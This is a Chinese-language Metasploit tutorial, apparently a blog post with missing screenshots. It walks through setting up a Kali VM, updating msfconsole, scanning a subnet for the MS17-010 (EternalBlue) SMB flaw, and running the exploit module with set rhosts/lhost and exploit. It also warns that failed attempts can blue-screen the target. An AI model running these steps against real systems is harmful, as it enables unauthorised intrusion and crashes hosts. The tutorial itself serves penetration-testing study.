Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,适合于需要核实漏洞的安全专家,同时也适合于强大进攻能力的渗透测试专家。
Metasploit基本是 远程的最快的那权限的方式。
VMware里的kali虚拟机
配置IP地址
在里面只需要敲红框里的内容,配置网卡、IP地址、掩码和网关
ifup eth0开启网卡
centos用yum安装,kali不一样,是apt-get install 软件名
但在安装前要更新apt的源,vim /etc/apt/sources.list,如下图:(这些在网上找文章更新源,比如阿里云)
msfconsole,简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,是一款非常好的漏洞框架,有些高危漏洞没扫出来,在这个框架里基本能找到
输入msfconsole回车,运行metasploit,如下图:
红框是漏洞库
一开始上来可能没有这么多,上边更新源以后,在这下面敲msfupdate,即可对库进行更新
输入以下这个命令(search ms17-010),可以查看ms17-010的payload(有效载荷),有辅助的,也有直接利用的,还有一个扫描的
下图0-1为扫描模块,2-5为漏洞模块,0-2模块可以扫描靶机是否可以被漏洞利用
使用的话输入use auxiliary/scanner/smb/smb_ms17_010,想知道怎么用,show options
再输入info可以查看说明
扫描网段的命令 :set rhosts 网址或网段, exploit用run也可以正常会扫描整个网段,有问题会显示绿颜色
这就是有漏洞显示绿色
现在使用另一个模块
search ms17-010 (忘了的话就查找下)
设置靶机ip
set rhosts 192.168.43.117
设置攻击ip
set lhost 192.168.43.109
开启漏洞攻击
exploit
攻击成功则会向下图这样显示,要是中间断开没有攻击成功(win2003会直接蓝屏,07、08还行)的话,被攻击的电脑主机可能会蓝屏
成功的话
下图是一个集中的漏洞库,网站,更新得很快,很多和kali是兼容的,如果有更新可以加载到kali里
